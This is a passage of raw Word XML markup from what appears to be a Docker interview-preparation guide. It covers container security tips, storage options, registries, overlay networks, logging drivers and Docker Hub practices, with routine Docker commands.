          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use network segmentation (docker network) to isolate containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D4A5B" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Host Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A4ABD" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Keep Docker and the host OS up to date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B623204" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement firewall rules to restrict access to Docker daemons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112598E0" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use SELinux/AppArmor for additional container isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A667F8C" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="598"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secrets Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Store sensitive data using Docker Secrets (in Swarm) or external secret managers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79380435"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8" w:name="_Toc178383380"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>15. How do you manage storage in Docker?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w14:paraId="75066A19"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Docker provides several storage options to manage data within containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221433C" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Volumes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The most common storage option, managed by Docker, independent of the container lifecycle. Volumes can be shared between containers and are the preferred choice for persistent data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211D1BE8"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24012A2B"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volume create my-volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB8464"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run -v my-volume:/data my-image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D2E930" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bind Mounts:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Map a directory on the host to a directory in the container. Useful for development but not recommended for production due to potential permission issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D48AFC1"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69BEF391"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run -v /host/data:/container/data my-image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D92E614" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="599"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Tmpfs Mounts:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Store data in the host’s memory, providing fast and ephemeral storage. Suitable for sensitive data that should not persist after the container stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67917663"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54A2407E"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run --tmpfs /app tmpfs my-image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F90F803"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199" w:name="_Toc178383381"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>16. What is a Docker Registry, and how do you use it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w14:paraId="27878DEB"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Docker Registry is a storage and distribution system for Docker images. Docker Hub is the most common public registry, but you can also set up private registries using Docker’s own registry image or third-party solutions like AWS ECR, GitLab Container Registry, or JFrog Artifactory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165C298B"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Basic Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B283AC" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="600"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Push an Image:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B59D1E7"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tag my-image my-registry/my-image:v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD65DDD"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push my-registry/my-image:v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDBC40C" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="600"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pull an Image:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38593923"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pull my-registry/my-image:v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F1C037"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lastRenderedPageBreak/>
        <w:t>Setting Up a Private Registry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21776B49"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run -d -p 5000:5000 --name my-registry registry:2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B81F1"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200" w:name="_Toc178383382"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>17. What is Docker Overlay Network, and when would you use it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w14:paraId="3A95041F"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An Overlay Network in Docker is a multi-host network that allows containers to communicate securely across different Docker hosts. This is particularly useful in a Docker Swarm or other clustered environments where containers need to interact across nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CBDFA0"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Usage Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054E9FBF" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To connect services deployed across different nodes in a Docker Swarm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345312B8" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For enabling communication between containers that reside on different hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7201ED61"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Creating an Overlay Network:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43997EE4"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network create --driver overlay my-overlay-network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5D8C0"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Services in the Swarm can now communicate across the overlay network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F793B7A"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201" w:name="_Toc178383383"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>18. How does Docker handle logging?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
    </w:p>
    <w:p w14:paraId="48EBAFBB"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Docker handles logging through the logging drivers, which determine how container logs are processed and where they are stored. By default, Docker uses the json-file driver, storing logs in JSON format on the host filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C16ECE"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Changing the Logging Driver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12048EB9"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run --log-driver=syslog my-image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E415CA"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Common Logging Drivers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7024C444" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>json-file</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Default, stores logs as JSON on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8A5565" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>syslog</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Sends logs to a syslog server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAE4B9" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>journald</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Integrates with systemd journal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A256FAB" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>awslogs</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Sends logs to Amazon CloudWatch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59399A28" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gelf</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Sends logs to Graylog Extended Log Format (GELF) endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DBE2BA"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Viewing Logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C1395B" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295"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docker logs &lt;container_id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C22A41"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202" w:name="_Toc178383384"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>19. What is Docker Hub, and what are some best practices for using it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w14:paraId="63DBE36A"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Docker Hub is a cloud-based repository where Docker users can store and share container images. It hosts public and private images, allowing for easy distribution and deployment of Dockerized applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B0579E"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DF069" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Official Images:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always prefer official images or well-known trusted publishers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9CC5D5" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Version Tags:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use version tags instead of latest to ensure consistency across deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E667A" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automated Builds:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set up automated builds for your repositories to keep images up to date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E37F4" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="603"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Security Scans:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly scan images for vulnerabilities using Docker Hub’s security scanning feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6805591D" w14:textId="77777777" w:rsidR="00F92295" w:rsidRPr="00DA2F32" w:rsidRDefault="00F92295" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
